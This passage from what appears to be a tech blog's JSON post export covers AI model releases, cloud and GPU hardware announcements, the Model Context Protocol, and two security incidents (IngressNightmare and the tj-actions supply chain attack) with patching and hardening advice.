thinking partner — something that forces you to articulate problems clearly and then stress-tests your assumptions. This approach to AI in development aligns with the AI platform strategies major tech companies are pursuing, treating AI as a collaborative tool rather than an autonomous agent. The model\u0026rsquo;s reasoning process often highlights edge cases I hadn\u0026rsquo;t considered, even when its proposed solution isn\u0026rsquo;t quite right.\nWe\u0026rsquo;re moving from \u0026ldquo;AI that generates code\u0026rdquo; to \u0026ldquo;AI that reasons about systems,\u0026rdquo; and that\u0026rsquo;s a significant evolution. The next few months will tell us whether this reasoning capability translates into meaningful productivity gains across the industry, or whether it\u0026rsquo;s primarily useful for a narrow set of complex analytical tasks.\nFor now, I\u0026rsquo;d recommend every developer spend a few hours experimenting with o3 and o4-mini on their hardest current problem. The results might surprise you.\n","date":"17 April 2025","externalUrl":null,"permalink":"/posts/250417-openai-o3-o4-mini-reasoning-models/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"OpenAI releases o3 and o4-mini reasoning models, bringing chain-of-thought inference to mainstream developer workflows.","title":"OpenAI's o3 and o4-mini — Reasoning Models Get Real","type":"posts"},{"content":"Google Cloud Next 2025 wrapped up yesterday in Las Vegas, and if you were paying attention, the message was unmistakable: the cloud wars have become AI infrastructure wars. The star of the show was Ironwood, Google\u0026rsquo;s 7th-generation TPU, and it represents a significant leap in what cloud providers are willing to build — and spend — to win the AI compute race.\nHaving attended Cloud Next events (virtually and in person) since the early days, I can say this one felt different. The entire conference was organized around a single thesis: AI workloads are the future of cloud computing, and everything else is secondary.\nIronwood: What Makes It Different # Google\u0026rsquo;s Ironwood TPU is purpose-built for large-scale AI inference and training. The numbers are impressive — Google claims a 4x improvement in performance-per-watt compared to TPU v5e, with significantly larger high-bandwidth memory pools that allow hosting bigger model shards per chip. This represents a major evolution in GPU and AI infrastructure strategy compared to competitors.\nWhat strikes me most is the architectural decision to optimize heavily for inference workloads alongside training. Previous TPU generations were primarily training-focused, with inference being handled by separate infrastructure. Ironwood unifies this, which makes economic sense when you consider that inference costs are rapidly becoming the dominant expense for organizations running production AI systems. Understanding AI infrastructure costs and inference optimization directly impacts deployment decisions.\nThe pod configurations scale up to 9,216 chips in a single cluster, connected via Google\u0026rsquo;s custom inter-chip interconnect (ICI). For context, that\u0026rsquo;s enough compute to run multiple copies of the largest foundation models simultaneously. Google is clearly building this for their own Gemini infrastructure first, but the fact that they\u0026rsquo;re making it available through Google Cloud is telling — they want enterprise customers locked into their AI compute stack.\nGemini 2.5 Pro and the Developer Story # The other major announcement was Gemini 2.5 Pro, which Google positions as their most capable model for coding and complex reasoning tasks. They demonstrated it handling multi-file code refactoring, long-context document analysis, and agentic workflows that chain multiple tool calls together.\nWhat caught my attention was the emphasis on the 1-million-token context window in production. We\u0026rsquo;ve heard about long context windows before, but Google showed real enterprise use cases — feeding entire codebases into the model for analysis, processing lengthy legal documents, and maintaining coherent conversations across massive amounts of reference material.\nFrom a developer tools perspective, Google also announced tighter integration between Gemini and their Cloud development suite. Firebase got AI-powered features, Cloud Run got streamlined model deployment, and BigQuery can now use Gemini for natural language data exploration. This mirrors the broader developer platform maturity seen across cloud infrastructure. The platform play is becoming very cohesive.\nThe Multi-Cloud Reality Check # Here\u0026rsquo;s what I think gets lost in the excitement of these announcements: most enterprises I\u0026rsquo;ve worked with over the past few years aren\u0026rsquo;t all-in on a single cloud. They\u0026rsquo;re running workloads across AWS, Azure, and GCP, often with some on-premises infrastructure still in the mix.\nGoogle\u0026rsquo;s strategy with Ironwood and the broader AI platform is clearly designed to change that calculus. If your AI inference runs best on TPUs, and your TPUs only exist in Google Cloud, you\u0026rsquo;ve got a strong incentive to centralize. It\u0026rsquo;s the same playbook AWS ran with custom Graviton instances — build hardware that only works in your cloud and make it compelling enough that migration becomes attractive.\nThe counter-argument is Kubernetes and the open ecosystem. Google themselves built Kubernetes to be cloud-agnostic, and tools like GKE Enterprise are designed to work across environments. But AI workloads don\u0026rsquo;t move easily between hardware architectures. A model optimized for TPU inference doesn\u0026rsquo;t just port to NVIDIA GPUs or AWS Trainium without significant engineering effort.\nWhat About the Competition? # AWS has been building their own AI chips — Trainium2 is in preview, and they\u0026rsquo;ve been aggressive with pricing. Microsoft and Azure have their NVIDIA partnership and custom Maia chips in development. But Google has a unique advantage: they\u0026rsquo;ve been building custom AI hardware longer than anyone. TPU v1 shipped internally in 2015. That\u0026rsquo;s a decade of silicon design iteration. Understanding the cost implications of these infrastructure choices is crucial for effective cloud cost engineering.\nThe question isn\u0026rsquo;t whether these chips are good — they are. The question is whether Google can translate hardware leadership into cloud market share. Historically, having the best technology hasn\u0026rsquo;t been enough in the cloud market. AWS won with breadth of services and developer mindshare. Azure won with enterprise relationships and Microsoft 365 integration.\nMy Take # What I find most compelling about Cloud Next 2025 isn\u0026rsquo;t any single announcement — it\u0026rsquo;s the coherence of the vision. Google is betting that AI infrastructure will be the deciding factor in the next phase of cloud competition, and they\u0026rsquo;re building every layer of the stack: custom silicon, optimized networking, integrated ML frameworks, and application-layer AI services. This mirrors the competitive hardware announcements from NVIDIA and echoes broader industry moves toward specialized compute.\nFor those of us building systems that need to scale, the practical takeaway is this: it\u0026rsquo;s worth evaluating TPU-based inference seriously, especially if you\u0026rsquo;re running large language models like Claude in production. The cost-performance improvements from Ironwood could meaningfully change your infrastructure economics.\nBut don\u0026rsquo;t lock yourself in without an exit strategy. The cloud landscape shifts fast, and today\u0026rsquo;s best option might not be tomorrow\u0026rsquo;s. Architect for portability where you can, optimize for performance where you must.\nThe AI infrastructure war is just getting started, and as engineers, we\u0026rsquo;re the ones who get to decide where the workloads actually run.\n","date":"10 April 2025","externalUrl":null,"permalink":"/posts/250410-google-cloud-next-2025-ironwood-tpu/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"Google unveils its 7th-gen Ironwood TPU at Cloud Next 2025, signaling a new phase in the cloud AI infrastructure war.","title":"Google Cloud Next 2025 — Ironwood TPU and the Infrastructure Arms Race","type":"posts"},{"content":"While the tech press has been focused on model sizes and benchmark scores, something potentially more important has been quietly gaining momentum: Anthropic\u0026rsquo;s Model Context Protocol (MCP). Announced late last year as an open standard, MCP is starting to see real adoption — and it could fundamentally change how we build AI-powered applications.\nWhat MCP Actually Is # At its core, the Model Context Protocol defines a standardised way for AI models to interact with external tools and data sources. Think of it as a universal adapter layer between an LLM and the world outside its training data.\nBefore MCP, every AI integration was bespoke. Want your AI assistant to query a database? Write a custom function. Want it to search your codebase? Build another integration. Want it to interact with your project management tool? Yet another custom adapter. Each AI platform had its own approach: OpenAI has function calling, Anthropic has tool use, Google has function declarations — all similar in concept but different in implementation.\nMCP proposes a different model: define your tools and data sources once, using a standard protocol, and any MCP-compatible AI client can use them. It\u0026rsquo;s the same pattern we\u0026rsquo;ve seen succeed in other domains — LSP (Language Server Protocol) standardised how editors talk to language tooling, and it transformed the developer tools landscape. MCP aims to do the same for AI integrations.\nThe Architecture # MCP follows a client-server architecture. MCP servers expose capabilities — tools, resources (data), and prompts — through a standardised JSON-RPC interface. MCP clients (typically AI applications or agents) connect to these servers and can discover and invoke their capabilities.\nThe protocol supports multiple transport mechanisms, including stdio (for local integrations) and HTTP with Server-Sent Events (for remote services). A typical setup might look like:\nAI Application (MCP Client) ├── MCP Server: File System Access ├── MCP Server: Database Queries ├── MCP Server: Git Operations └── MCP Server: API Integration Each server is a relatively simple program that exposes its capabilities in a structured format. The AI model receives descriptions of available tools and can decide when and how to use them based on the user\u0026rsquo;s request. This is where it differs from traditional API integration — the AI has agency in choosing which tools to invoke and how to compose them.\nThe SDKs are available in TypeScript and Python, making it straightforward to build both servers and clients. I\u0026rsquo;ve been experimenting with building a few MCP servers, and the developer experience is genuinely good — you can have a working server exposing custom tools in under an hour. This is especially powerful because modern foundation models like Claude can dynamically discover and reason about available tools.\nWhy Adoption Is Picking Up # Several factors are driving MCP adoption right now. First, Anthropic open-sourced the specification and reference implementations under a permissive license, removing the \u0026ldquo;vendor lock-in\u0026rdquo; concern that often kills open standards from single companies.\nSecond, developer tool makers are starting to integrate MCP natively. Cursor, the AI-powered code editor, added MCP support, which means you can extend its AI capabilities with custom tools without waiting for the Cursor team to build specific integrations. Other development tools are following suit.\nThird, the community has been prolific. There are already MCP servers for databases (PostgreSQL, SQLite), cloud platforms (AWS), version control (Git, GitHub), file systems, and dozens of other tools. The ecosystem is growing in that organic, bottom-up way that characterises successful open standards.\nImplications for Developers # If MCP succeeds as a standard, it changes the calculus for AI integration in several ways.\nBuild once, use everywhere. Instead of building separate integrations for each AI platform, you build an MCP server for your tool or service, and it works with any MCP-compatible client. This is especially valuable for internal tools — instead of building a ChatGPT plugin AND a Claude integration AND a custom solution, you build one MCP server.\nComposability. Because MCP servers are independent processes, you can mix and match them. Need an AI agent that can search your codebase, query your monitoring system, and create Jira tickets? Connect three MCP servers and the AI can orchestrate across all of them. This composability is powerful for building complex workflows without monolithic integration code.\nSecurity boundaries. Each MCP server runs in its own process with its own permissions. This is architecturally cleaner than giving an AI model direct access to everything — you can control what each server exposes and audit its usage independently. The protocol includes capability negotiation, so clients and servers can agree on what operations are permitted.\nLocal-first development. The stdio transport means MCP servers can run entirely on your local machine with no cloud dependency. This is important for sensitive codebases and development environments where sending data to external services isn\u0026rsquo;t acceptable.\nChallenges and Open Questions # MCP isn\u0026rsquo;t without challenges. The security model, while better than \u0026ldquo;give the AI your API key,\u0026rdquo; still needs maturation. When an AI agent can dynamically discover and invoke tools, the attack surface is broad. Malicious MCP servers, prompt injection through tool outputs, and privilege escalation through tool composition are all concerns that the community is actively working on.\nThere\u0026rsquo;s also the adoption chicken-and-egg problem. MCP is most valuable when there\u0026rsquo;s a rich ecosystem of servers and clients, but developers won\u0026rsquo;t build servers until there are enough clients, and vice versa. Anthropic\u0026rsquo;s integration in Claude Desktop and the Cursor adoption help bootstrap this, but it needs more momentum. As governance frameworks like the EU AI Act start requiring visibility into AI agent actions, standardized protocols like MCP for tool invocation will become increasingly important.\nPerformance is another consideration. Each tool invocation adds latency — the AI decides to use a tool, sends a request to the MCP server, waits for a response, and then incorporates the result. For interactive applications, this round-trip overhead can affect the user experience. Server implementations need to be fast, and clients need to handle async tool calls gracefully.\nMy Take # I\u0026rsquo;ve seen enough technology cycles to be cautious about \u0026ldquo;universal standards\u0026rdquo; — for every LSP success story, there are a dozen standards that never achieved critical mass. But MCP has several things going for it: a clear problem statement, a well-designed protocol, good reference implementations, and backing from a major AI company that\u0026rsquo;s committed to keeping it open.\nWhat excites me most is the potential to make AI integration a first-class part of the developer experience rather than an afterthought. Right now, connecting AI to your specific tools and data is still too much friction. If MCP can reduce that friction to \u0026ldquo;install an MCP server and it just works,\u0026rdquo; it\u0026rsquo;ll unlock a lot of practical AI applications that are currently too expensive to build.\nWhether Anthropic\u0026rsquo;s protocol becomes the standard or merely inspires a better one, the direction is right. We need standardised ways for AI models to interact with the world, and MCP is the most credible attempt I\u0026rsquo;ve seen so far.\nPart of my Developer Landscape series, exploring the tools and trends shaping how we build software.\n","date":"3 April 2025","externalUrl":null,"permalink":"/posts/250403-model-context-protocol-adoption/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"Anthropic’s Model Context Protocol is gaining traction as a universal standard for connecting AI models to tools and data sources, and the implications for the developer ecosystem are worth watching.","title":"Model Context Protocol — The Quiet Standard That Could Reshape AI Tooling","type":"posts"},{"content":"If you\u0026rsquo;re running Kubernetes with the ingress-nginx controller — and statistically, there\u0026rsquo;s a good chance you are — stop reading this and patch first. The set of vulnerabilities collectively dubbed \u0026ldquo;IngressNightmare\u0026rdquo; by the researchers at Wiz is as bad as it sounds: unauthenticated remote code execution that can lead to full cluster takeover. This follows the pattern of zero-day patch cycles and highlights why supply chain security matters for infrastructure. This is a CVSS 9.8, and it deserves your immediate attention.\nThe Vulnerability Chain # IngressNightmare isn\u0026rsquo;t a single vulnerability but a chain of issues (CVE-2025-1974, CVE-2025-1097, CVE-2025-1098, CVE-2025-24514) that, when combined, allow an attacker with network access to the admission controller to achieve remote code execution without any authentication.\nThe core problem lies in the ingress-nginx admission controller, which validates Ingress objects before they\u0026rsquo;re applied to the cluster. The controller takes Ingress configuration and passes it through NGINX configuration generation, but certain annotations can be crafted to inject arbitrary NGINX directives. The admission controller runs with elevated privileges — it needs to read secrets across the cluster to configure TLS — which means code execution in this context gives you access to every TLS certificate and secret in the cluster.\nThe attack flow works roughly like this:\nAn attacker sends a specially crafted AdmissionReview request to the admission controller webhook The malicious Ingress annotations inject directives into the NGINX configuration template When NGINX validates the generated configuration, the injected directives execute arbitrary code The attacker gains a shell with the permissions of the ingress-nginx service account The particularly nasty aspect is that the admission controller webhook is often exposed on the pod network, meaning any pod in the cluster — or anything that can reach the cluster network — can trigger it. In many cloud environments, the admission webhook endpoint is reachable from within the VPC without additional authentication. Understanding platform maturity and infrastructure hardening is essential for defending against such attack surfaces.\nWhy This Is Worse Than a Typical CVE # Several factors make IngressNightmare especially concerning. First, the prevalence: ingress-nginx is the most popular ingress controller for Kubernetes, used in roughly 40% of clusters according to Wiz\u0026rsquo;s analysis. That\u0026rsquo;s an enormous attack surface.\nSecond, the privilege level: the ingress-nginx controller typically has access to all Secrets in the cluster because it needs to configure TLS. Compromising it doesn\u0026rsquo;t just give you a foothold — it gives you the keys to the kingdom. TLS private keys, API tokens, database credentials — anything stored as a Kubernetes Secret is potentially exposed.\nThird, the stealth factor: the exploit works through the admission webhook, which is a legitimate Kubernetes API endpoint. It doesn\u0026rsquo;t require creating any persistent resources in the cluster, making it harder to detect through standard audit logging that focuses on resource creation and modification.\nThe Patch and Mitigation # The ingress-nginx team has released patched versions that address all four CVEs. If you\u0026rsquo;re running ingress-nginx, update to version 1.12.1 or 1.11.5 immediately. Check your installed version:\nkubectl get deployment -n ingress-nginx ingress-nginx-controller \\ -o jsonpath=\u0026#39;{.spec.template.spec.containers[0].image}\u0026#39; If you can\u0026rsquo;t patch immediately, there are mitigations:\nRestrict network access to the admission webhook. The admission controller webhook shouldn\u0026rsquo;t need to be accessible from arbitrary pods. Use NetworkPolicies to limit which sources can reach it:\napiVersion: networking.k8s.io/v1 kind: NetworkPolicy metadata: name: restrict-admission-webhook namespace: ingress-nginx spec: podSelector: matchLabels: app.kubernetes.io/name: ingress-nginx ingress: - from: - namespaceSelector: {} podSelector: {} ports: - port: 8443 protocol: TCP Disable the admission controller if you\u0026rsquo;re not actively using it for validation. Remove the ValidatingWebhookConfiguration for ingress-nginx. You lose admission validation, but you eliminate the attack vector.\nAudit your annotation usage. The specific annotations exploited include auth-url, auth-tls-match-cn, and custom configuration snippets. If you\u0026rsquo;re not using these, restrict them via admission policies.\nThe Bigger Picture: Kubernetes Security Complexity # IngressNightmare is a symptom of a broader challenge with Kubernetes security. The platform is extraordinarily flexible, but that flexibility creates a large and complex attack surface. Every controller, operator, and webhook is a potential entry point, and the permissions model — while powerful — makes it easy to grant excessive privileges without realising the implications. Securing these systems requires the kind of hardening practices documented in dedicated guides.\nI\u0026rsquo;ve been working with Kubernetes since the early days, and the security posture of most clusters I encounter still worries me. Common issues include: overly permissive RBAC roles, no network policies (the default is allow-all), secrets stored unencrypted in etcd, and admission controllers running with cluster-admin equivalent permissions. These vulnerabilities mirror the attack vectors we see in CI/CD supply chain compromises, where misconfigured infrastructure permissions become the critical weakness.\nThe ingress controller is particularly critical because it\u0026rsquo;s the front door — it\u0026rsquo;s the component that terminates external traffic and routes it into the cluster. Compromising the front door bypasses all the internal security controls you\u0026rsquo;ve carefully configured.\nMy Take # Every time a vulnerability like IngressNightmare drops, I hear the same refrain: \u0026ldquo;Kubernetes is too complex.\u0026rdquo; And there\u0026rsquo;s truth to that — the operational burden of running Kubernetes securely is substantial. But the answer isn\u0026rsquo;t to abandon Kubernetes; it\u0026rsquo;s to invest in understanding and hardening it properly.\nWhat concerns me most about this vulnerability is how many teams are running ingress-nginx in production without understanding the implications of the admission controller\u0026rsquo;s privilege model. The controller needs broad secret access by design, which means it must be treated as a tier-zero security component — on par with your identity provider and certificate authority.\nIf this incident motivates you to do one thing, make it this: review the RBAC permissions and network exposure of every admission webhook in your cluster. They\u0026rsquo;re some of the most privileged components in your infrastructure, and they deserve corresponding security attention. Following supply chain security standards for infrastructure components means treating permission boundaries as seriously as you treat data protection.\nPatch today. Audit tomorrow. Don\u0026rsquo;t let this one slip through the backlog.\nPart of my Security in Practice series, examining real-world security incidents and what they mean for development and operations teams.\n","date":"27 March 2025","externalUrl":null,"permalink":"/posts/250327-ingress-nightmare-kubernetes-vulnerability/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"CVE-2025-1974 and related vulnerabilities in the Kubernetes ingress-nginx controller allow unauthenticated remote code execution, affecting an estimated 40% of Kubernetes clusters.","title":"IngressNightmare — Critical Kubernetes NGINX Vulnerability Puts Clusters at Risk","type":"posts"},{"content":"Jensen Huang took the stage at GTC this week in San Jose, and as usual, the keynote was a masterclass in product roadmap theatre. But behind the leather jacket and the carefully choreographed reveals, there\u0026rsquo;s a genuinely important story about where computing infrastructure is heading. Nvidia isn\u0026rsquo;t just selling GPUs anymore — they\u0026rsquo;re defining the architecture of AI-era data centres.\nBlackwell Ultra and the Compute Trajectory # The headline announcement is the Blackwell Ultra GPU, which succeeds the Blackwell architecture that started shipping to cloud providers late last year. The numbers are impressive on paper: significantly higher memory bandwidth, larger HBM3e capacity, and improved interconnect speeds for multi-GPU configurations.\nBut the number that matters most for practitioners is the inference throughput improvement. Nvidia is claiming substantial gains in tokens-per-second for large language model inference, which directly translates to lower cost per query for anyone running AI services at scale. If you\u0026rsquo;re deploying models in production, the economics of each hardware generation determine what\u0026rsquo;s viable.\nWhat\u0026rsquo;s more interesting to me is the NVLink 6 interconnect improvements. The bottleneck for large model training and inference isn\u0026rsquo;t just raw compute — it\u0026rsquo;s how fast you can move data between GPUs. Blackwell Ultra\u0026rsquo;s NVLink improvements mean you can scale to larger clusters without the interconnect becoming the limiting factor as quickly. For training runs that span thousands of GPUs, this is where the real gains come from.\nVera Rubin: Looking Two Steps Ahead # In typical Nvidia fashion, Jensen didn\u0026rsquo;t just announce the current generation — he previewed the next next generation: the Vera Rubin architecture, expected in 2026. Named after the astronomer who provided evidence for dark matter, the Rubin GPU paired with the Vera CPU represents Nvidia\u0026rsquo;s move toward tighter CPU-GPU integration.\nThis matters because the trend in AI workloads is moving toward more heterogeneous compute. Not everything in an AI pipeline benefits from GPU acceleration — data preprocessing, tokenization, and orchestration logic often run more efficiently on CPUs. Having a tightly integrated CPU-GPU system with high-bandwidth shared memory could simplify the software stack significantly.\nFor those of us building inference pipelines for advanced AI models today, the implication is clear: the hardware is going to keep getting faster and more efficient, which means the software architecture decisions we make should optimise for flexibility rather than squeezing every last bit of performance from current hardware. What\u0026rsquo;s GPU-memory-bound today might not be in eighteen months.\nDGX Cloud and the Democratisation Question # The other significant announcement is the expansion of DGX Cloud, Nvidia\u0026rsquo;s cloud-hosted AI supercomputing service. Partnerships with major cloud providers mean that teams without the capital (or power infrastructure) to buy racks of Blackwell GPUs can still access them on demand.\nThis is important for the broader developer ecosystem. The cost barrier to training or fine-tuning large models has been a significant filter on who gets to participate in AI development. Cloud access to cutting-edge hardware doesn\u0026rsquo;t eliminate the cost entirely — it\u0026rsquo;s still expensive — but it changes the economics from \u0026ldquo;multi-million dollar capital expenditure\u0026rdquo; to \u0026ldquo;operational expense you can scale up and down.\u0026rdquo;\nI\u0026rsquo;ve been watching this dynamic play out in several projects where teams start with cloud GPU instances for experimentation, then evaluate whether on-premises hardware makes sense for production workloads with predictable demand patterns. The break-even calculation varies enormously based on utilisation rates. This same buy-versus-rent decision applies to competing platforms like Google\u0026rsquo;s custom TPUs, and Nvidia\u0026rsquo;s rapid hardware cadence makes the calculation even more complex — do you buy Blackwell today knowing Rubin is eighteen months away?\nThe Software Stack Is the Moat # What often gets overlooked in the GTC hardware spectacle is that Nvidia\u0026rsquo;s real competitive advantage is the software ecosystem. CUDA has been the dominant GPU programming framework for over a decade, and the ecosystem of libraries built on top of it — cuDNN, TensorRT, NCCL, Triton Inference Server — creates enormous switching costs.\nGTC 2025 continued this strategy with announcements around NIM (Nvidia Inference Microservices) and expanded framework support. The NIM containers package optimised models with the right runtime configurations, making it significantly easier to deploy models in production without deep GPU programming expertise.\nFor developers, this is a double-edged sword. The abstraction layers make it easier to get started and achieve good performance, but they also deepen the dependency on Nvidia\u0026rsquo;s stack. AMD\u0026rsquo;s ROCm and Intel\u0026rsquo;s oneAPI are making progress, but the gap in the software ecosystem remains the real barrier to GPU competition — not the hardware specs.\nThe Energy Elephant in the Room # One topic that received less attention than it deserves is power consumption. These new GPU systems draw enormous amounts of electricity, and the cooling requirements are pushing data centres toward liquid cooling solutions. Nvidia showcased some of this infrastructure, but the fundamental question remains: as AI compute demand grows exponentially, where does the power come from?\nFor developers and infrastructure teams, this has practical implications. Cloud providers are already seeing capacity constraints in certain regions, and pricing reflects the power costs. If you\u0026rsquo;re planning AI infrastructure deployments, energy availability and cost should be in your architecture decisions alongside the usual performance and latency considerations.\nMy Take # I\u0026rsquo;ve attended GTC presentations (remotely, at least) for years now, and the trajectory is remarkable. Nvidia has executed a strategy of controlling the full stack — hardware, interconnects, system software, and increasingly the application frameworks — that gives them a position in AI infrastructure similar to what Intel had in enterprise computing in the 2000s.\nFor most developers, the practical takeaway from GTC 2025 is that AI inference is going to get cheaper and faster, which expands the range of applications where it makes economic sense. If you\u0026rsquo;ve been holding off on integrating AI capabilities into your products because of cost concerns, revisit those calculations. The cost curve is dropping faster than most people expected.\nThe competitive landscape for AI hardware will evolve — AMD, Intel, and custom silicon from the hyperscalers will eventually provide real alternatives. Similar competition exists at the software systems level where languages and kernels enable different performance characteristics. But for the next couple of years at least, Nvidia\u0026rsquo;s ecosystem dominance means their roadmap is effectively the industry\u0026rsquo;s roadmap. Plan accordingly.\nPart of my Infrastructure Notes series, examining the systems and platforms that underpin modern software development.\n","date":"20 March 2025","externalUrl":null,"permalink":"/posts/250320-nvidia-gtc-2025-blackwell-ultra/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"Nvidia’s GTC 2025 keynote unveiled Blackwell Ultra and the next-gen Vera Rubin architecture, doubling down on the infrastructure layer that powers everything in AI.","title":"Nvidia GTC 2025 — Blackwell Ultra and the Infrastructure Race for AI","type":"posts"},{"content":"If you\u0026rsquo;re running GitHub Actions in your CI/CD pipeline — and let\u0026rsquo;s be honest, most of us are at this point — you need to pay attention to what happened this week. The popular tj-actions/changed-files action was compromised, and attackers used it to exfiltrate secrets from CI runners across thousands of repositories. This is the kind of supply chain attack that keeps me up at night.\nWhat Happened # The tj-actions/changed-files action is widely used — it helps workflows determine which files changed in a pull request or push, so you can conditionally run tests, lints, or deployments. It has millions of downloads and is referenced in countless workflow files.\nAttackers managed to compromise the action by modifying the tagged releases. When a workflow references an action by tag (e.g., tj-actions/changed-files@v45), GitHub resolves that to a specific commit. The attackers altered what the tags pointed to, inserting malicious code that dumped CI runner environment variables — including secrets — to workflow logs.\nThe attack was initially spotted by researchers at StepSecurity, who detected unusual behaviour in their monitoring systems. The compromised versions were live for a window during which any repository using the action would have its secrets exposed in build logs.\nThe attack vector likely started through a compromise of the related reviewdog/action-setup action, which tj-actions had as a dependency. This cascading dependency compromise is exactly what makes supply chain attacks so devastating — you don\u0026rsquo;t just need to trust the action you\u0026rsquo;re using, you need to trust everything it depends on, and everything that depends on, all the way down.\nThe Fundamental Problem with GitHub Actions Security # Here\u0026rsquo;s the uncomfortable truth: the way most teams use GitHub Actions is inherently risky. The common pattern of referencing actions by mutable tag names means you\u0026rsquo;re running code that can change underneath you without any notification or approval process.\nConsider this typical workflow snippet:\n- uses: tj-actions/changed-files@v45 That @v45 tag can be re-pointed to a completely different commit at any time. Unlike a pinned dependency in package-lock.json or go.sum, there\u0026rsquo;s no integrity verification happening here by default. You\u0026rsquo;re essentially giving the action maintainer — or anyone who compromises their account — the ability to run arbitrary code in your CI environment with access to all your repository secrets.\nThe secure alternative is to pin actions to specific commit SHAs:\n- uses: tj-actions/changed-files@abc123def456789... But almost nobody does this because it\u0026rsquo;s inconvenient. You lose automatic patch updates, and the workflow files become harder to read. This is a classic security-versus-usability tension, and usability has been winning.\nBroader Supply Chain Lessons # This incident is part of a pattern we\u0026rsquo;ve been seeing across the software ecosystem. These attacks follow the same supply chain compromise patterns we\u0026rsquo;ve documented in npm incidents and other package ecosystems. Each one demonstrates that build and deployment infrastructure is a high-value target.\nWhat makes CI/CD supply chain attacks particularly dangerous is the blast radius. A single compromised action or dependency can affect thousands of organisations simultaneously. And CI environments typically have elevated privileges: deployment credentials, cloud provider tokens, package registry keys, database passwords. It\u0026rsquo;s a treasure trove.\nThe industry has been making progress on supply chain security — SLSA frameworks, Sigstore for signing, SBOM requirements — but the CI/CD pipeline remains a weak link. The tooling for verifying the integrity of CI components lags far behind what we have for application dependencies.\nWhat You Should Do Right Now # First, audit your GitHub Actions workflows. Search your repositories for any reference to tj-actions/changed-files and update or remove it. Check the GitHub advisory for the specific affected versions.\nSecond, pin your actions to commit SHAs, at least for actions that run with access to secrets. Yes, it\u0026rsquo;s more maintenance. Use Dependabot or Renovate to automate SHA updates — they can propose PRs when new versions are released, giving you a review step.\nThird, restrict secret access. Use GitHub\u0026rsquo;s environment protection rules and required reviewers to limit which workflows can access production secrets. Not every PR build needs your deployment credentials.\nFourth, monitor your CI output. Tools like StepSecurity\u0026rsquo;s Harden-Runner can detect anomalous network activity from your CI runners. If a build step is making unexpected outbound connections, you want to know about it.\nFinally, consider using only first-party or verified actions where possible. GitHub\u0026rsquo;s own actions (actions/checkout, actions/setup-node, etc.) have a higher security bar. For everything else, evaluate whether the convenience is worth the risk — sometimes a few lines of shell script in your workflow file is safer than importing a third-party action.\nMy Take # I\u0026rsquo;ve been doing DevOps before it had a name, and the speed at which CI/CD pipelines have become the new \u0026ldquo;soft underbelly\u0026rdquo; of software organisations still catches me off guard. This echoes the patterns we see in network infrastructure compromises where perimeter systems become the critical entry point. We spent years hardening our production environments, implementing zero-trust networking, and encrypting everything in transit and at rest. Meanwhile, our build systems are pulling in unverified code from the internet and running it with our most sensitive credentials.\nThe tj-actions incident should be a wake-up call, but I\u0026rsquo;ve seen enough \u0026ldquo;wake-up calls\u0026rdquo; in this industry to know that most teams won\u0026rsquo;t change their practices until it directly affects them. If you\u0026rsquo;re reading this, don\u0026rsquo;t wait for that to happen. Spend an afternoon auditing your CI pipelines. It\u0026rsquo;s the highest-impact security work you can do this week.\nThis is part of my Security in Practice series, covering real-world security incidents and their implications for development teams.\n","date":"13 March 2025","externalUrl":null,"permalink":"/posts/250313-github-actions-supply-chain-attack/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"A compromised GitHub Action exposed secrets from thousands of repositories, highlighting how CI/CD pipelines have become prime targets for supply chain attacks.","title":"The tj-actions Supply Chain Attack — Why Your CI/CD Pipeline Is an Attack Surface","type":"posts"},{"content":"Anthropic just released Claude 3.7 Sonnet, and after spending a few days with it, I\u0026rsquo;m genuinely impressed. This isn\u0026rsquo;t just an incremental model bump — the introduction of \u0026ldquo;extended thinking\u0026rdquo; represents a fundamentally different approach to how LLMs tackle complex problems. For developers using AI as a daily tool, this matters.\nWhat Extended Thinking Actually Does # The concept is deceptively simple: before generating its final response, Claude 3.7 Sonnet can now engage in an explicit chain-of-thought reasoning process. You can see the model\u0026rsquo;s thinking unfold in real time — working through the logic, considering edge cases, and revising its approach before committing to an answer.\nThis is different from the implicit reasoning that all transformer models do. Extended thinking makes the reasoning process transparent and, crucially, longer. The model can spend significantly more compute on actually thinking through a problem rather than pattern-matching to the most likely token sequence.\nIn the Anthropic announcement, they highlight substantial improvements on coding benchmarks — SWE-bench scores jumped meaningfully compared to Claude 3.5 Sonnet. This evolution follows broader advances in foundation model capabilities, particularly in reasoning depth and accuracy. But benchmarks only tell part of the story.\nReal-World Impact on Coding Workflows # Where I\u0026rsquo;ve noticed the biggest difference is in multi-step reasoning tasks. Ask Claude 3.7 to debug a complex async race condition, and you can watch it systematically work through the execution flow, identify the timing window, and propose a fix that actually addresses the root cause rather than papering over symptoms.\nThe extended thinking also shines in architectural discussions. I threw a moderately complex microservices migration question at it — decomposing a monolithic Node.js application with shared state — and the thinking process revealed it was genuinely considering trade-offs between consistency models, not just regurgitating the \u0026ldquo;use event sourcing\u0026rdquo; playbook that earlier models would default to.\nFor code review, the improvement is noticeable. The model catches subtle issues that previous versions would miss: potential deadlocks in concurrent code, edge cases in error handling paths, and even performance implications of certain patterns. This kind of automated code review capability intersects with governance requirements around AI system documentation. It\u0026rsquo;s not infallible by any means, but the hit rate on useful observations has gone up considerably.\nThe Hybrid Model Approach # What\u0026rsquo;s interesting architecturally is that Claude 3.7 Sonnet is what Anthropic calls a \u0026ldquo;hybrid\u0026rdquo; model — you can use it with or without extended thinking enabled. This is a pragmatic design choice. Not every query needs deep reasoning. When you\u0026rsquo;re asking for a quick code snippet or a straightforward refactoring, the overhead of extended thinking would be wasteful.\nThe API lets you control a budget_tokens parameter that caps how much thinking the model can do. This is smart from a cost perspective — you\u0026rsquo;re essentially paying for compute time proportional to reasoning depth. For CI/CD integrations where you might use an LLM for automated code review, being able to dial this up or down based on the complexity of the changeset makes the economics more viable.\nI\u0026rsquo;ve been experimenting with setting different thinking budgets for different tasks: low budget for docstring generation and simple refactors, high budget for security review and architecture decisions. It works well in practice.\nWhat This Means for the AI Coding Tool Landscape # The extended thinking approach puts pressure on other AI coding tools to evolve beyond simple autocomplete and chat interfaces. GitHub Copilot, Cursor, and others have been primarily optimized for speed — getting code suggestions in front of you as quickly as possible. Claude 3.7 Sonnet suggests there\u0026rsquo;s a complementary mode where you actually want the AI to slow down and think 